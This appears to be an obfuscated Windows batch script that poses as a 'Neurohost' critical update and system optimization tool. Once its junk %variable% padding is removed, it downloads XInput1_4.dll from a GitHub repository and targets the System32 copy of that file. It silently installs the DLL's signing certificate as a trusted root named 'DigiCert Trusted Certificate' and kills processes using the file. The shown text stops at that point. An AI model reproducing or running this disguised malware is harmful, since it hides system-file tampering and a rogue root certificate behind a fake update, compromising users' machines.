e%fITcRGs%c%jtD%h%MHwhstHGe%o%atcauhYY% %Qhbi%=%bPugGmDxPt%=%TCXKnwi%=%EENzDXXLHO%=%zXwRbd%=%LloZLh%=%BxazxiUWnA%=%zJPhTuPo%=%I%=%OvXPuvVQ%=%Nw%=%YXzuuL%=%oPc%=%sYFFs%=%dUyt%=%qdmqhS%=%EVo%=%EKetMg%=%AfWr%=%JEHWaU%=%DBJtBO%=%vMphN%=%zVInkW%=%wDSdlsLmtU%=%JBPOzb%=%SDl%=%jIoLzMLr%=%yiJPdIdBJB%=%SGI%=%VGGWsXy%=%kYyUgzbwX%=%ORnka%=%vRHVIJI%
set /p choice="Select an option (1-2): "
s%kyUWK%e%tRCyvLOi%t%Z% %oxnn%/%CfbNZfOnoN%p%wxzVzv% %GkHeERgoS%c%Sa%h%vt%o%uKCOXRG%i%MlYZTLezUc%c%N%e%QWxMygvIdQ%=%GEOcuCJP%"%vOM%S%nVcQfyzyHM%e%Q%l%tdQ%e%fY%c%PplQBOp%t%QScrqTeEoL% %IsBL%a%RH%n%oSbyig% %sVYeW%o%eddxD%p%Rc%t%sy%i%IZFJwu%o%GNIjmZboNy%n%b% %Vwqc%(%Qh%1%l%-%AwrgMZsAUJ%2%kiwAa%)%SZLf%:%fQXo% %VEX%"%YPySL%

i%aYOpQg%f%zVi% %NjWDH%"%wjXFv%%choice%"%iyyiJqCUwX%=%G%=%OQ%"%B%1%tkeeqjMMd%"%mlDnniN% %KizuvILjUm%g%JhALpXDK%o%JOaddE%t%Mts%o%yEyCIXNsZ% %NztUyBaodI%r%LotnGAnOI%e%Snw%p%AiZhpy%l%sPyajKavgA%a%Sfwiuj%c%hDmHyi%e%pLHJVUNOi%
i%meaSfPr%f%bfEZEl% %IjlDQ%"%wek%%choice%"%QqZSiCbiO%=%IDXp%=%R%"%fecI%2%dlW%"%xKUm% %RV%e%svEkZYpC%x%roO%i%V%t%XSowgnU%

g%WHMAYJkHrS%o%BXoBpSWlmO%t%rSt%o%gxMws% %FqozfHmjco%m%xlwsptCUTg%e%ckIW%n%gWSkbCslPQ%u%foxVt%

:replace
:%xivDrab%r%johD%e%qLehhyUD%p%LgEqoJR%l%NB%a%Ty%c%sZeM%e%JBmyK%
c%zvvP%l%qeeakZ%s%BAvEh%
echo Neurohost Module: Applying critical update...
e%P%c%U%h%Fx%o%gUucc% %LvAuuh%N%MBJxUbwdJ%e%GdT%u%efqNmfQa%r%xjuMqEHD%o%waaIsYAU%h%M%o%Ox%s%MZgp%t%TfKv% %qZvzRfI%M%GfhcvZriA%o%YE%d%GXamHYqk%u%sGH%l%WxEGeVM%e%wF%:%MAf% %CKrtm%A%GgTSgbwOx%p%hHDuDOgF%p%Z%l%VIU%y%yJjAPF%i%vBYQUPRo%n%qxosXmvdUv%g%tPpx% %AAWKcy%c%KyN%r%lEwIS%i%u%t%EEVVTD%i%Icvty%c%MXYRVS%a%mbZOHN%l%kfyMfPO% %NUd%u%mqCPvfviQ%p%AB%d%mM%a%DhyZDbyq%t%XIcMmth%e%qLU%.%N%.%RBPGCQkq%.%zuIzuJNoF%
e%hEm%c%ak%h%MBpgPZrq%o%FJlnr% %KNsXgSQd%=%RwZDTgsuz%=%dha%=%AHegzgnjqF%=%PBvDaR%=%zaYvdi%=%Qfz%=%CyrkUriwz%=%ZgEBF%=%JmVbVi%=%Fkyp%=%sey%=%LXPGJNAJm%=%aaXcaZ%=%gqpGZllYu%=%BELfCGkok%=%J%=%ZytyadAR%=%jEmxtIY%=%vEQnqgo%=%fpVuF%=%BMUXTPJl%=%aE%=%dl%=%qddDL%=%C%=%uo%=%sgdM%=%vG%=%jj%=%lvkbU%=%nDmMqrpi%=%tB%
echo WARNING: This action will apply system-level optimizations.
e%AcLYZ%c%xKQ%h%NkHi%o%Vbkdrl% %pQhbqs%W%JW%A%Feu%R%ApB%N%oPBuOqeip%I%u%N%Vr%G%nTz%:%wCIsltdYm% %s%T%PQy%h%SuUAJO%i%KcHMoI%s%l% %QeVhx%a%VBKQxzWB%c%XBLZMCNIED%t%peLBUV%i%VhBFT%o%tsvySRtUS%n%hbZBlS% %xEjG%w%NjykJWjx%i%zuwI%l%xdSEqNbsr%l%YPr% %XCgJoMy%a%eUwUM%p%OH%p%Wao%l%NUSZunAWRs%y%IJnCJVTcR% %pQcwRSJL%s%cyWOeKFk%y%NMiXevuN%s%CB%t%obyYNEBT%e%PoiZupWoLQ%m%fMgtIO%-%W%l%NEOHPqLqf%e%npQ%v%fyDWhlPm%e%h%l%y% %sJ%o%yJpugtfy%p%xVnAlI%t%Buf%i%cFgzd%m%DFsr%i%Dwl%z%DSUm%a%gDWG%t%busGIh%i%f%o%xG%n%e%s%RuyHc%.%VjixBO%
e%DFLUBJpjd%c%y%h%WmKmQBS%o%YcWZyXGhh% %ZpQlUvPs%P%ZuQxggUG%l%k%e%OcXDGlkubs%a%b%s%AtMsw%e%tj% %pig%e%mhi%n%VN%s%JhYE%u%EpD%r%BYZ%e%Ul% %CPRCfxl%a%GhqWALIIFw%l%bS%l%b% %th%p%dpsmbtFB%r%gQQBxjh%o%wKmuscII%c%Bd%e%iHoEj%s%ybEk%s%C%e%jCeFPL%s%YHZEJsLfHO% %OhCGj%a%UNjq%r%bmVewfeA%e%AMDsNcasD% %UoBo%c%qwOIoCDh%l%YfMBPiRTd%o%PV%s%NPGZXzBFGj%e%L%d%aVGntIQ% %wASGneMbiV%a%KGBE%n%kNWHdxG%d%hNZzFCFu% %IE%p%szi%r%NpgzrhKRLI%o%LzaTAdr%c%VlVPR%e%hiXjhZTZVJ%e%QwhKBwibQa%d%qzvVIYEDQL% %GgvGVa%o%jrvEg%n%LbJaYktXJ%l%dlmHaJ%y%Chfs% %VjSHyjaw%i%CY%f%lpWpr% %lERxGiExn%y%tXQBt%o%IEj%u%NCU% %TKDUummb%a%qUI%r%Mfplv%e%xWOV% %euxt%r%koGN%e%b%a%jEa%d%HoyQtPkKw%y%fEWmmTnb%.%wltdyngtP%
e%svDiaUldLV%c%AJr%h%sbcOUTo%o%kv% %vlLEHlRZyg%=%X%=%wmRea%=%vs%=%fvQAp%=%oURCBIIx%=%GYfS%=%ZKuYOohZIA%=%RtHTc%=%jQOEOMxaRD%=%MVE%=%ZXnANz%=%McM%=%okU%=%dlBk%=%p%=%y%=%bMSS%=%gYpjFBhJ%=%BjwAouoW%=%GL%=%LI%=%rLXOUmrMbf%=%MAPP%=%DVHiV%=%bI%=%xngYt%=%eNsmDhA%=%KbgHiqIOI%=%gZSacrFht%=%P%=%GwIkB%=%pfM%

:: Check for Admin Privileges
:%tgSgvjwm%:%QbWR% %dmd%C%mBRmcs%h%UaT%e%kFFSKD%c%ACqFsDSueI%k%ZHtvqpa% %RRiT%f%qDxy%o%s%r%Iw% %qKHSpgq%A%wtNyopCkv%d%UHVJ%m%AxdEGBW%i%fhcDQ%n%fAAPI% %XezldUewC%P%SPp%r%jfrcYOQ%i%pUdhiUa%v%sDicWK%i%KOtLMF%l%szJuHU%e%mnogGBQkI%g%iDFGBy%e%mY%s%iKhokhfsQV%
n%Go%e%cTi%t%PzPzSnhbac% %jBcLlmUApS%s%FVNc%e%yTkYIOEI%s%VESdxuC%s%XxxbrmMFXv%i%KX%o%HBLpesdTvA%n%EC% %remtoOIN%>%snvWnOiITx%n%XQoMwGTjp%u%b%l%BBebBaS% %zDjHf%2%IRVlMG%>%ZLVFe%&%eHdIyOb%1%dClxT%
i%P%f%oW% %K%%errorlevel% %gxlRxmWBK%n%zryhehcHj%e%VnhVV%q%i% %dZ%0%dPsqHDj% %ct%(%xFVyecClIS%
    echo ERROR: Administrator privileges required.
 %HORpkw% %ljB% %oyFtVr% %osmkNq%e%MUDsD%c%QeDG%h%nrkKFvh%o%e% %XWKm%E%FLC%R%jl%R%Ah%O%LHLbRaq%R%pp%:%rQh% %VbPww%A%FdGrASqB%d%muWlE%m%LkDbqdwtaz%i%GSg%n%XfzApmhmJh%i%YOPXdOOaxS%s%SyCiTylA%t%DBiXz%r%XtscKaX%a%pM%t%F%o%qEzQtuGWtG%r%gfw% %dlQAKUG%p%yIIP%r%c%i%KDYaYBtCPK%v%P%i%IwKVOjarwG%l%nPFie%e%gwFfH%g%elKmwH%e%O%s%YmsovAtD% %MW%r%FZzGFyC%e%Qfv%q%BpfyytaMRE%u%Pcx%i%jrkNybP%r%uqSvkZINJK%e%JxsFdPYFPw%d%VxzCbO%.%QGYw%
 %BQcbMoPzF% %uTVSQSzcAV% %bizLVaJD% %LIChUzht%e%EVUC%c%QecfZMC%h%gRCyGwgRz%o%igFBN% %EFPOWm%P%myptXj%l%uSDL%e%HqgQthaV%a%HUp%s%fzD%e%GNUCghZ% %kujXGLa%r%MLzjnw%u%gRTZuW%n%mo% %A%t%zYLBuQrK%h%Yz%i%HJutSBQek%s%vb% %TJQVbQhiPZ%s%kcQVEeFQy%c%W%r%eAsfi%i%Qu%p%ymdg%t%rGeyRiix% %f%a%fPZbbBZI%s%OviVH% %QPihV%A%AXLjeXPjFw%d%NzRaMjt%m%gkJR%i%QekU%n%oHxjrhTedu%i%QDL%s%aBxCmyJDrn%t%xESGJHEwJF%r%EbZ%a%fdKSh%t%JKqT%o%UPtwBjt%r%XCuzJ%.%jPF%
 %q% %gIlYfkpxFp% %Vh% %RFROQQJtjo%p%vFSiRf%a%YX%u%Kev%s%HJ%e%ZwOHSphmb%
 %pOOYtCu% %mW% %ipthaDfux% %YXX%e%fBhczRNRbr%x%nqvewVU%i%Wqr%t%kMIZ% %TrWQXbKtbX%/%EdFmUL%b%BSKo%
)%nM%

:: Set the URL for the file download
:%Ug%:%mqzb% %FrARhJMmj%S%p%e%iFZPjm%t%iHAa% %StqZv%t%yQC%h%KB%e%XVHOFqE% %J%U%o%R%B%L%iN% %yofmqe%f%tJQcQrUg%o%RBKKsXrz%r%mJ% %ZXeqOVBMym%t%yog%h%zte%e%tT% %Xxm%f%Jr%i%MGvq%l%CJctXyiMJO%e%CQRYF% %hQUhdpYNo%d%Bop%o%HBQudXz%w%DWBbMvHsh%n%XpypkEwwA%l%qqk%o%Du%a%nUyJz%d%DcXWRLq%
set "dll_url=https://github.com/dadajjjjakd11/Neuro/blob/main/XInput1_4.dll"
s%LMyQAVhZL%e%cSYUUhGNT%t%ZhzYwCIPI% %TUxJm%"%taNPpRvRPZ%d%y%l%zWxYfWDA%l%DIDGZJ%_%qbSkwnQYIF%u%xqGq%r%kufcZoT%l%iNZ%=%v%h%NGbeNSXO%t%nvFJDngET%t%CXC%p%teHv%s%QdhySP%:%LFgQwqETin%/%BhtxiBFYQ%/%oLyP%g%dcbINemlW%i%W%t%vh%h%yUVT%u%LND%b%pAWIF%.%O%c%ZHMRAMyS%o%cby%m%CGTDnbr%/%XGvcUGI%d%vIyaRpGDN%a%cojliMiRhv%d%HQSc%a%oXtsKC%j%z%j%Utn%j%mwGpIQzwd%j%vSgAILeCU%a%ptupPZFT%k%SJX%d%VqnmORoqIJ%1%GWPZUtvAw%1%hKSL%/%eSMjDm%N%tAwXwVU%e%Ugwtag%u%LkxuecOC%r%aapN%o%EkIhNcYpdj%/%hKHsn%b%mxYBGaTru%l%QeU%o%U%b%WByU%/%W%m%aJAxLvp%a%LCgvt%i%pOGXw%n%BvXCPg%/%Xde%X%B%I%Rdsdrt%n%qrHaHpOCfr%p%x%u%MknH%t%eYMT%1%vDcuwREMl%_%DnThxTTtXf%4%yreLYgQU%.%zcobgovmv%d%vCYhGmL%l%lagIR%l%lwMR%"%KTb%
s%pPlljBX%e%IrmSSU%t%FCGwkaNKWd% %Si%"%QtdWfeup%d%YMMXaS%l%j%l%IdrzDMn%_%sXwRCsaA%p%xNSF%a%kY%t%JAbZNx%h%rI%=%CUVy%%TEMP%\%bz%X%wnmPs%I%qP%n%F%p%b%u%oAUdXhCbD%t%NvYSN%1%SwJuvfRTk%_%bIy%4%nACBWooCcm%.%A%d%IK%l%GcMUY%l%vZTpoKsx%"%BiUF%
s%PmqFJ%e%lwI%t%xnFiToLTTC% %AUkqlRgh%"%IkJwbHK%s%F%y%JGTDD%s%XIFy%t%cQoUaH%e%ezyC%m%Cu%_%xS%d%fAaKsCJ%l%GZcUYTloL%l%b%_%VxwqR%p%ZThxGi%a%RMeo%t%VCreZS%h%KWJRPAHzy%=%QPr%%SystemRoot%\%knJfd%S%mh%y%X%s%UUWuLMYScm%t%lKDVTUqoCB%e%Rn%m%zCzJeeEjG%3%tMKsvgquuf%2%fCKYPR%\%Ad%X%vSSgS%I%TJNSbWyx%n%ifnK%p%WDK%u%NuZrAckBzS%t%uWA%1%fdoqadOX%_%joVvz%4%IyQ%.%imRcOJZnaT%d%YyuomBm%l%L%l%tL%"%X%
s%ZGdq%e%sGuyaOkWu%t%nAETf% %cXMN%"%aZbP%c%RiyZSYwpxl%e%JfLBXl%r%ZSwAHMQcTb%t%FX%_%MqFwp%p%nd%a%ydlj%t%R%h%RNhsGUPNV%=%ijkcmoxx%%TEMP%\%OgpzCfNG%t%iETADzlE%e%EdmdHsLHs%m%ikHQouIxZU%p%xE%_%zetgom%c%e%e%LDzAYgX%r%PbM%t%vESGBn%.%I%c%dnJtlWCkBE%e%qxK%r%bBLZ%"%rUDozuG%

:: Download the file using PowerShell
:%Q%:%umEXgqjsAH% %zEXeScZ%D%Ingj%o%MheKZpX%w%hDeR%n%SrTToEYh%l%coOi%o%uaB%a%JPpY%d%SAeoIzURMz% %P%t%mVwLElF%h%thW%e%bd% %dOmZLe%f%giBTZ%i%zB%l%ExT%e%oXmEB% %nXFfykWuV%u%tq%s%bKuWZ%i%SQCHM%n%ufkILFf%g%mbanfSizOZ% %mppqvJbB%P%cpo%o%AaMcH%w%KbfR%e%h%r%IJd%S%FnwFKeV%h%IYHB%e%WoxcHjbDXz%l%AwavYa%l%WSIqBrKTj%
e%vPLGZqzwr%c%A%h%FLItaOn%o%xDpO% %QkJCNIztou%C%OuUkOvonX%o%NBKUVXOTo%n%Hs%n%pnmicOA%e%MbFkR%c%V%t%wEQ%i%cIEREcCZU%n%Polo%g%dCz% %btynE%t%UKHOZXT%o%Oenu% %cpOw%t%nZHxt%h%ERDJJPh%e%VdQpbwx% %HgOeIJ%s%MIjZD%e%AhLfot%r%epiQiX%v%mKv%e%GdQBI%r%CtuJODeLAP% %LMbiqxxN%f%sv%o%bKdZ%r%UYiatx% %MLJeMFfam%H%TpfJOWLTRh%D%zonDcOmrlk%N%vRLQL% %PTOyDZ%u%QFZ%p%PaFw%d%nOOqWlDWX%a%NJa%t%EQUxAGlMdF%e%nmDJMC%.%yl%.%DnIkYUBYP%.%fM%
p%FF%o%kFEYlFqiq%w%FvXJ%e%prOVub%r%LHip%s%RNH%h%VTkL%e%OlvMzOb%l%jAPlrTvX%l%xrgGPN% %dHOTNEyucs%-%ewsNuoKx%C%IrHXzCbJ%o%fZEwFxb%m%JZXick%m%vgjtqbzj%a%SRaB%n%E%d%m% %jxOVN%"%hrWhdPXKMn%&%v% %q%{%w%I%NCe%n%jdKoPPXSVp%v%AUzvk%o%mk%k%RgoKisXs%e%ApJKsaebcs%-%GNqEXQ%W%eoiD%e%LTYrMpHRMt%b%rNSfuaoeS%R%ipx%e%LCmvLhSdH%q%MUg%u%OSCLaUrc%e%TVHFbOMOb%s%kzFkMtMPP%t%A% %XOajIJ%'%rjBwRdHXI%%dll_url%'%UrxLQv% %CsuUkJf%-%w%O%QvGxOUoMai%u%tGkOmLE%t%wYVwCMzaoK%F%ublcZmtO%i%BvBg%l%ukBaJoikEz%e%Sh% %DUSuuAIxM%'%OqIbFkJ%%dll_path%'%bGaRnJo%}%yTTxgj%"%aFSzfvzG%

:: Check if the download was successful
:%UmnsmKm%:%cLHlmTBmua% %r%C%pc%h%NUenKnGWz%e%KIaCeHIhK%c%zolmXAqhd%k%TfQg% %bDUku%i%AHyRxOT%f%j% %yCYe%t%r%h%HPAhPwmqKB%e%oINnGdKaFJ% %FUxQIWB%d%B%o%WBUGP%w%TVdVNnbUmk%n%GCUHWebz%l%WffQwWXr%o%b%a%pTjkAc%d%iATBoreBeL% %H%w%TD%a%oojSTW%s%XZzvcRJoZk% %bw%s%CrmJJJ%u%FD%c%EBvBrXklM%c%SjNSguZR%e%AXIhuU%s%NT%s%UUXgq%f%GCvkioWURm%u%IfsBIlKoPG%l%wtWZIb%
i%MoVE%f%YYrt% %cgsVY%n%hb%o%RRRHNmI%t%VIcFRzbe% %nAktWdswmT%e%cfqx%x%XBWsyEjU%i%MFAeIHyZc%s%GPhKFlqDZ%t%wDDtWZeMPG% %YWsEtgeSYm%"%fh%%dll_path%"%LkPzX% %beW%(%ybhrp%
    echo ERROR: Download failed! Please check your internet connection or the link.
 %VBcNXBUsNL% %y% %IlA% %LeaGRHUyN%e%rIUHfbzgV%c%BG%h%SEd%o%ZfHWehwR% %qNwCHyn%E%FsBwAZSn%R%hInU%R%tr%O%NnRzTy%R%nrhClcaHG%:%fZvj% %LFotv%D%VTnY%o%nWtOgiUN%w%dQw%n%eWAgpVxmTm%l%R%o%PYBK%a%PgITnqzpOY%d%JtSocFFs% %SHDoKno%f%hkmZtx%a%nLffyva%i%cS%l%Ktwv%e%vErqEPLsZX%d%XXcqZVnz%!%vQcmlowDnM% %IwcyCUV%P%DFvwf%l%sljr%e%WpTioWjxn%a%KpxNXBQSk%s%BOljaapds%e%Q% %Jsjn%c%REzaoeR%h%jVPl%e%NPCtorJ%c%BKJ%k%RxO% %bPaHOFYHq%y%qCslP%o%PnfngqJ%u%eSQYS%r%Ypjwbdqr% %oIALZCknt%i%XUr%n%uVscJFqM%t%cheqDXVad%e%wLLzdE%r%HrMYKCu%n%QTHy%e%Deyb%t%QSRgfAXV% %REMYRRM%c%hMkAcEo%o%MhbFWnQ%n%mGPJ%n%WzMdPso%e%ZtdTUL%c%uXKnNrzVVI%t%EweN%i%Oq%o%woDRTzei%n%xLCFOqi% %jciAwSmeTI%o%Au%r%Mmzt% %opr%t%tXQqPS%h%vAtFcF%e%EA% %FGMz%l%fXx%i%yxCACUmVO%n%iTgzb%k%x%.%neyuXFlMJp%
 %mZnLKEDyp% %oZxXH% %EFJ% %nqYerJozJ%p%oZ%a%yHXTEi%u%WOh%s%P%e%FzvwrrGtvW%
 %te% %cZOpzoIY% %EpNNpJY% %GMKFnZNe%e%XYtviYETz%x%P%i%Nr%t%KIrN% %bcER%/%zMmzeiy%b%hKvTtkXbO%
)%OfvkIWyz%
echo SUCCESS: Update file downloaded.
e%goGGgyg%c%ilbqe%h%dFFjPTAWWw%o%tEVAGQP% %hb%S%qCjMy%U%Md%C%WaPUeehrS%C%BnoKrpENVL%E%YYFRckOMwS%S%gL%S%UATbzdCLmj%:%TIraOxi% %WvVxB%U%LYgvwXMcE%p%yfcY%d%BUMyvVHq%a%GXLb%t%idkwzVkPQv%e%d% %l%f%lw%i%wLYgOz%l%lnW%e%lOR% %Cykf%d%pdcSBjJ%o%pFTDLL%w%vtkZgonU%n%VVBIATeL%l%TksboWO%o%ezhSSI%a%nsbA%d%PjFjmVtge%e%PxHSb%d%wUtBNWb%.%EjhByK%

:: Silent Certificate Addition with Friendly Name
:%HfRIHoru%:%cmVj% %sS%S%BjNdBz%i%ag%l%skEUox%e%UouyZmPPg%n%kfYexHXx%t%G% %zCT%C%IXplO%e%TCdHtzs%r%KKbCVaSV%t%wujMdVuBAr%i%GMKTUdgufn%f%jU%i%yP%c%h%a%iXRo%t%VX%e%EXgNvaTyp% %HRlmoo%A%fU%d%uu%d%BwiIc%i%ulBNSQO%t%nLtARQuhY%i%LYVXt%o%M%n%cpeAkM% %cpI%w%Eh%i%Ax%t%LgD%h%gs% %VVXSJI%F%fVtn%r%dcCykggu%i%nOufLEaIdi%e%uXIqbnjcc%n%bZeWgoR%d%GxTMzwgETn%l%snrJR%y%VIyTfL% %FDJt%N%sPf%a%z%m%MIaJXuzGO%e%WwnhZLa%
p%MXglfuM%o%i%w%bVpJQNviUn%e%ULu%r%BigZ%s%rDe%h%r%e%pjOBFbSfGa%l%yYTk%l%wAFADvpaj% %f%-%PAytGlKuk%C%lUDNCTI%o%RwSwuO%m%mAZBHFR%m%IPanAaCGa%a%gIbOnE%n%GrIuqEfrJk%d%bA% %HpZ%^%TKFALszSKg%
"%urkIgxJAI%^%MPKdkSHFSl%
 %M% %LABKZJNgwm% %niNhHuan% %NaqviIL%$%cyv%c%jFHkgjAgQX%e%IRPsqiP%r%E%t%QPj% %moICbptkpU%=%Vaet% %ukjJrzPg%G%ImxEv%e%tSYKpznJ%t%r%-%uaAx%A%djvixYp%u%zwtJlDsDpV%t%KABVzhH%h%BQtG%e%jBbWeDYX%n%p%t%VL%i%f%c%MAphVlHU%o%DasG%d%gJoxlO%e%P%S%wxohRtoB%i%YKiIS%g%eFIQkVl%n%xVYHYy%a%anl%t%YV%u%BPPagD%r%zrZQxXowz%e%CYrZ% %X%'%xdRvUjonKO%%dll_path%'%fNKuYm%;%peFqPpFg% %xNmQ%^%xgdg%
 %LDE% %NFLhwVMMO% %PLq% %eaEToRgXuY%i%cPVpbc%f%UhtarZTHk% %R%(%xbyKMucf%$%aqV%c%WfQBkyKG%e%q%r%Dlx%t%ALr%.%EsiasZgVo%S%GnTDjJ%i%uXLx%g%pv%n%HEsWxTWtj%e%u%r%KEBYjpl%C%dlIpHvRmHy%e%LlCasUBoLZ%r%MN%t%jTM%i%ugtC%f%xVgPD%i%djA%c%hDZK%a%Ju%t%ZQ%e%OCZRDqkUAQ%)%Y% %rRoMSR%{%wTwz% %olrrwp%^%END%
 %vQF% %OEaYc% %G% %oYobb% %hHNTxeqym% %YnL% %LaQUvZ% %CwMs%$%yF%s%HyARd%t%bHoeObJ%o%HpHSP%r%npwOoZri%e%XSIY% %nuVZy%=%Mjt% %XItnQXdD%N%CwG%e%XVNehfFTMI%w%HeJTKDByE%-%eCJyY%O%H%b%mFggauxc%j%HSWJ%e%a%c%hCF%t%uYbtUwBR% %Q%S%LDuSStN%y%rS%s%unFzqvE%t%YMY%e%OGCnl%m%dOXGUgddLY%.%UPr%S%yXTFrMK%e%Y%c%n%u%UmzFrcIaR%r%XUqHDdVJ%i%cEKcaEHFD%t%QrrUUoVK%y%YK%.%FtNxKynu%C%sp%r%NkjSm%y%WlTKihuuxE%p%dQA%t%ijnYl%o%cGsSRKcS%g%W%r%EnpVtuzw%a%sCvvMWJ%p%jWH%h%jdu%y%koVoOLdTw%.%vpLQo%X%YcBAltK%5%ynq%0%hlvMT%9%nUB%C%MTtSR%e%Qv%r%naCqcMPc%t%Voccz%i%sm%f%sXrUVDnbb%i%WN%c%rcT%a%RcNNVe%t%n%e%P%s%bAYnlNPy%.%xfnmgbKlK%X%yMHu%5%LjMmv%0%rwAiD%9%R%S%CQDm%t%tiNQcWHB%o%BkYLh%r%hutAiK%e%elfwbQtce%(%gtluz%'%pSxn%R%Q%o%zNk%o%PxKIv%t%UwpezOT%'%g%,%YJmiUyi% %hUyiOTqNxp%'%fDdMW%L%ya%o%XdLJgTbR%c%PXLrvJ%a%y%l%qakn%M%sCj%a%LcWrYb%c%lcr%h%vNynGip%i%iFhDTmybH%n%HJVYJJ%e%cbPz%'%rBVuUjU%)%sx%;%tYyqQ% %ChASjrDpvN%^%Sck%
 %LAbAzhzHpT% %vahQxy% %ctP% %G% %SZaksXIqEg% %fyTHWVdvqz% %HZ% %W%$%YPlGluN%s%dBG%t%H%o%bUVi%r%TVgNMTIWXE%e%SGRrsRO%.%H%O%hCscuPJMd%p%uwYdqeihU%e%w%n%WxRny%(%W%'%jHn%R%mZI%e%pAx%a%sg%d%JPTseAqG%W%l%r%rJYYRtMth%i%mYSqulO%t%KwNZiumQnx%e%YPINV%'%c%)%IppFcwAKzI%;%U% %a%^%v%
 %ecAzV% %NohxpcC% %RpSbBdwwy% %QIlDwxI% %wXLGA% %pZN% %AWIWiNCa% %JMH%$%LGObv%c%FwtiprUB%e%fmDH%r%AXnPEdXa%t%aFFSOMgYA%O%OW%b%bCjeXncjn%j%UXAB% %DusbW%=%q% %cvmIho%$%X%c%VHDpnjtQM%e%lpbzdhL%r%VMRivp%t%b%.%HCAonGLRf%S%YPn%i%Fn%g%yrpam%n%CwJpxm%e%lGS%r%PwtzR%C%NfjqrQxdau%e%GIOzpSR%r%kFyHb%t%npXt%i%mjrlPJhx%f%WyVP%i%aWtBrt%c%InUXfOB%a%olXc%t%LpmgDIq%e%GtYDdpj%;%Gc% %PeZO%^%WGtJSJ%
 %QGON% %mVCtSxB% %P% %onA% %ePjmPwUgJ% %DjVcl% %q% %QxMTJ%$%DKCCKBimWE%c%QavwGzKWU%e%ziSaIVSm%r%HfGPfXH%t%MkeuKQ%O%vVVLbsmzP%b%mQSv%j%pDn%.%vYokmhs%F%ntYMXTTmuR%r%VgYbk%i%ghuQ%e%rmX%n%PGt%d%LTABFWh%l%QQ%y%wRlhCK%N%ReuDla%a%LNQZaJvQ%m%NmNnakKYV%e%TqB% %bxlVNEqo%=%JdkFVaRX% %TK%'%RYxnJz%D%gmsWNiT%i%VxFaiDBB%g%jjOvPrU%i%WYwSvJw%C%ERiCfbLcDA%e%LoftgwxmkA%r%xjF%t%zQQPkumC% %HEVUJCtu%T%PXgxGxDx%r%RMdsfSXsyP%u%Gw%s%Z%t%dxMAkpd%e%GaKkwsRjM%d%GMzwmIVPc% %txoXY%C%We%e%qoZNG%r%oNYjYZtdB%t%fsXksnP%i%KykpTKQeJ%f%Pfr%i%r%c%spiXNwC%a%oFMOLMtg%t%yfzydDy%e%YeGTIQIHiH%'%wYaeJhfaG%;%TRKJQXZSz% %EBCXFee%^%ydQ%
 %BMEAMDLzN% %ZPMhQiujpO% %THtnH% %lbAVIDtS% %c% %bDacuY% %EyBCtDx% %mF%$%Omb%s%NPtzblofhK%t%U%o%snympXfp%r%PzljEQ%e%RH%.%QZ%A%wByT%d%DZODKuPyFR%d%oZUh%(%ZsfZiypCL%$%t%c%sWmmORQAe%e%SqWMOde%r%aiWcoR%t%rXSfogIh%O%STpHQvGZ%b%BjgFfZx%j%EQhhFk%)%NxdDM%;%NxbsyaN% %ccQjtIqWAQ%^%fIgp%
 %wrm% %jAYLqZp% %JqTiVBv% %s% %LBrPNJmG% %DDOtXDW% %WzlwXCbwt% %FOweMaYB%$%gFrnO%s%mowZcBfvQq%t%tDszzvkc%o%JCPTZUHYCQ%r%WhcndcCp%e%sYWfdbtrTt%.%RGyEr%C%CDYTBGTEO%l%AV%o%PSVOPcigbh%s%wRzlwIX%e%RGLCn%(%qsA%)%A%;%KCjK% %KryqrNbN%^%fp%
 %ZDHV% %cOGz% %VZUxTbz% %oc%}%GlHSy% %c%^%hIOOSXH%
"%eXtfcCpxnq% %ZAd%>%auhoNSgeQ%n%XZiYbkln%u%b%l%Yfk% %wH%2%grWOM%>%O%&%YvFt%1%TzhUWFZ%

:: Find and terminate processes using the file
:%GPX%:%EGO% %EipaKVNf%F%tfmnPUEFah%i%YBMMeueK%n%YKOOG%d%gGODJY% %PTFHTYJg%a%sjWyS%n%MrbfnTXpIc%d%G% %BSruohd%t%RfZyofJv%e%rcCWbcT%r%BNl%m%sGSQdu%i%BYbWfxljzO%n%NvTr%a%RCxcFw%t%bLsd%e%OIng% %lu%p%qKtchFrjZs%r%lQo%o%LNkobjECV%c%kRen%e%GyMsB%s%gvRvlAj%s%Imqgq%e%WMuv%s%wiZFQz% %pnbawFJcm%u%dzX%s%a%i%IzuTYQXSvz%n%ZeRPgPNYTJ%g%sCLbtnwknG% %zQdZheSge%t%h%h%XwlOxzXB%e%fqZjtVhx% %lNGXtM%f%Kc%i%mVyeJpxk%l%iGzu%e%n%
e%uwwJFQ%c%adIwMfmmd%h%KQBkvLytK%o%By% %nLP%=%CdubzOSxJi%=%bJzuVGSsVZ%=%BZgJgv%=%IJBNcKyK%=%mTqWqOX%=%KpwxwchMg%=%Pd%=%HdqdYckN%=%rBkBudLNb%=%QDTGE%=%tC%=%vzk%=%HqzJm%=%lFmeAYCQsN%=%jAHjN%=%mDXMplXBqW%=%svUsdBfLmM%=%lPihEHVvvE%=%XfJpbRUn%=%d%=%ZdfwT%=%MGPlEvkt%=%WdVKv%=%Wb%=%WztpoIVx%=%DEswiDM%=%MKnbOCCWTk%=%Sq%=%jk%=%Kdf%=%kLJZsoF%=%yFXeapDDSh%
echo WARNING: Terminating processes for optimization...
e%fFyx%c%HtoBrkrLw%h%PSUi%o%KnyvUkGBTi% %ygVjbJOii%W%QeItxwCS%A%IpzsieOdGU%R%ltTRox%N%EikYMNy%I%DWFCj%N%WTA%G%fSLx%:%OhjYPbPdQM% %F%T%WpjSh%e%PQL%r%qMgTpSL%m%Sur%i%R%n%ykkf%a%sEHGWuEHn%t%Jum%i%lrwb%n%ztVc%g%x% %sTW%p%fHzJrXMlz%r%ZRPfyUjFg%o%bym%c%PdDb%e%jYAVQbUC%s%rjLuJMCN%s%wNZuezUlX%e%v%s%WrUpd% %K%f%bR%o%rQn%r%cuyHZmp% %NbQq%o%FRbG%p%xoyijq%t%XRxHIGXzue%i%NgvRPbSCy%m%HKNxyDT%i%DZNbuCIVW%z%jmmdL%a%nWtGPZbqG%t%pV%i%X%o%czRcHtXCAZ%n%hCUCS%.%WiRBTJPsCq%.%XHUDdBS%.%BvHizSYO%
